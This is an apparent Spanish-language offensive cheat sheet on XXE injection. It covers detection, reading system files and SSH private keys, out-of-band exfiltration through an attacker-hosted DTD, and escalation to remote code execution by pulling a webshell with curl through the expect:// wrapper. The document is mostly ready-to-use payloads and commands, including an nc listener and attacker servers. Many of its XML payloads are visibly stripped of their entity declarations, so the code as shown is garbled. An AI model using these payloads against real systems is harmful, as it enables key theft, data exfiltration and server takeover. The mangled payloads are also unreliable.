# XML external entity (XXE) injection ## Identificación XXE ### General {% tabs %} {% tab title="Request original" %} ```xml MrW0l05zyn example@example.com 112233 ``` {% endtab %} {% endtabs %} {% tabs %} {% tab title="Request modificado" %} ```xml ]> &xxe; example@example.com 112233 ``` {% endtab %} {% endtabs %} ### Out-of-band (OOB) Máquina atacante. ```sh nc -lvnp ``` {% tabs %} {% tab title="Request modificado" %} ```xml :'>]> &xxe; example@example.com 112233 ``` {% endtab %} {% tab title="Request modificado (parameter entities)" %} ```xml :'> %xxe; ]> MrW0l05zyn example@example.com 112233 ``` {% endtab %} {% endtabs %} ## Lectura de archivos ### Lectura de archivo general ```xml # Linux/Unix ]> &xxe; # Windows ]> &xxe; ``` ### Lectura de archivo id\_rsa Lectura de archivo `id_rsa` correspondiente a llave privada de usuario del servicio SSH (Secure SHell). ```xml # Linux/Unix /.ssh/id_rsa'>]> &xxe; # Windows /.ssh/id_rsa'>]> &xxe; ``` ### Lectura de archivo PHP ```xml ">]> &xxe; ``` ### Lectura de archivo utilizando CDATA Creación de archivo DTD (Document Type Definition). {% code title="xxe.dtd" %} ```sh echo '' > xxe.dtd ``` {% endcode %} Habilitación de servidor HTTP para compartir el archivo `xxe.dtd`. ```sh python -m SimpleHTTPServer python3 -m http.server ``` Lectura de archivo. {% hint style="info" %} Es posible que no podamos leer algunos archivos (como index.php), ya que el servidor web evitaría un ataque de DOS causado por la autorreferencia de archivo/entidad (es decir, bucle de referencia de entidad XML). {% endhint %} ```xml "> /xxe.dtd"> %xxe; ]> &joined; example@example.com 112233 ``` ### Lectura de archivo basado en error Creación de archivo DTD (Document Type Definition). {% code title="xxe.dtd" %} ```xml "> %error; %exfil; ``` {% endcode %} Habilitación de servidor HTTP para compartir el archivo `xxe.dtd`. ```sh python -m SimpleHTTPServer python3 -m http.server ``` Lectura de archivo. ```xml /xxe.dtd"> %remote; ]> ``` ### Lectura de archivo basado en XInclude ```xml ``` ### Lectura de archivo out-of-band (OOB) #### HTTP Creación de archivo DTD (Document Type Definition). {% code title="xxe.dtd" %} ```xml /?content=%file;'>" > ``` {% endcode %} Habilitación de servidor PHP. ```sh php -S 0.0.0.0:80 ``` Lectura de archivo. ```xml /xxe.dtd"> %remote; %oob; %exfil; ]> ``` #### PHP (protocol) Creación de archivo DTD (Document Type Definition). {% code title="xxe.dtd" %} ```xml /?content=%file;'>"> ``` {% endcode %} Creación de archivo `index.php`. {% code title="index.php" %} ```php ``` {% endcode %} Habilitación de servidor PHP. ```sh php -S 0.0.0.0:80 ``` Lectura de archivo. ```xml /xxe.dtd"> %remote; %oob; ]> &content; ``` ## XML external entity (XXE) injection a Remote Code Execution (RCE) ### Wrapper expect:// Creación de webshell. {% code title="webshell.php" %} ```php ``` {% endcode %} Habilitación de servidor HTTP para compartir el archivo `webshell.php`. ```sh python -m SimpleHTTPServer python3 -m http.server ``` Ejecución de cURL para descargar archivo `webshell.php` en el servidor. ```xml /webshell.php'"> ]> &xxe; example@example.com 112233 ``` Ejecución de comandos. ```sh http:///webshell.php?cmd=id ```